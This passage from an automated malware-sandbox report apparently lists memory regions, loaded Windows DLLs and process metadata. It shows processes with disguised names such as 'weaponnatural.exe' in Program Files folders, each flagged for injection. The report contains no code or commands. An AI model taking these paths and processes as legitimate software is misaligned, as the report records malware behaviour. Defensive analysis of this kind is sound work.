mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3352 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3353 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3354 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3355 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3356 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3357 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3358 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3359 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3360 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3361 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3362 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3363 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3364 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3365 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3366 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3367 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3368 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3369 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3370 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 171 os_tid = 0x1064 Thread: id = 172 os_tid = 0x1060 Process: id = "25" image_name = "serve.exe" filename = "c:\\program files\\msbuild\\serve.exe" page_root = "0x21113000" os_pid = "0x109c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\MSBuild\\serve.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3659 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3660 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3661 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3662 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3663 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3664 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3665 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3666 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3667 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3668 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3669 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3670 start_va = 0x180000 end_va = 0x196fff monitored = 0 entry_point = 0x1814a1 region_type = mapped_file name = "serve.exe" filename = "\\Program Files\\MSBuild\\serve.exe" (normalized: "c:\\program files\\msbuild\\serve.exe") Region: id = 3671 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3672 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3673 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3674 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3675 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3676 start_va = 0x9c0000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 3677 start_va = 0xb50000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 3678 start_va = 0x1f50000 end_va = 0x200bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 3679 start_va = 0x2060000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 3680 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3681 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3682 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3683 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3684 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3685 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3686 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3687 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3688 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3689 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3690 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3691 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3692 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3693 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3694 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3695 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3696 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3697 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3698 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3699 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3700 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3701 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3702 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3703 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3704 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3705 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3706 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 173 os_tid = 0x10d8 Thread: id = 174 os_tid = 0x10a0 Process: id = "26" image_name = "weaponnatural.exe" filename = "c:\\program files (x86)\\windowspowershell\\weaponnatural.exe" page_root = "0x5401d000" os_pid = "0x10a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\weaponnatural.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3707 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3708 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3709 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3710 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3711 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3712 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3713 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3714 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3715 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3716 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3717 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3718 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3719 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3720 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3721 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3722 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3723 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 3724 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3725 start_va = 0xab0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3726 start_va = 0xac0000 end_va = 0xb7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3727 start_va = 0x1210000 end_va = 0x1226fff monitored = 0 entry_point = 0x12114a1 region_type = mapped_file name = "weaponnatural.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\weaponnatural.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\weaponnatural.exe") Region: id = 3728 start_va = 0x1230000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 3729 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3730 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3731 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3732 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3733 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3734 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3735 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3736 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3737 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3738 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3739 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3740 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3741 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3742 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3743 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3744 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3745 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3746 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3747 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3748 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3749 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3750 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3751 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3752 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3753 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3754 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 175 os_tid = 0x10e0 Thread: id = 176 os_tid = 0x10a8 Process: id = "27" image_name = "camera.exe" filename = "c:\\program files\\microsoft office 15\\camera.exe" page_root = "0x5b2c6000" os_pid = "0x1068" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Microsoft Office 15\\camera.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office 15\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3371 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3372 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3373 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3374 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3375 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3376 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3377 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3378 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3379 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3380 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3381 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3382 start_va = 0x180000 end_va = 0x196fff monitored = 0 entry_point = 0x1814a1 region_type = mapped_file name = "camera.exe" filename = "\\Program Files\\Microsoft Office 15\\camera.exe" (normalized: "c:\\program files\\microsoft office 15\\camera.exe") Region: id = 3383 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3384 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3385 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3386 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3387 start_va = 0x700000 end_va = 0x7bbfff monitored = 1 entry_point = 0x0 region_type = 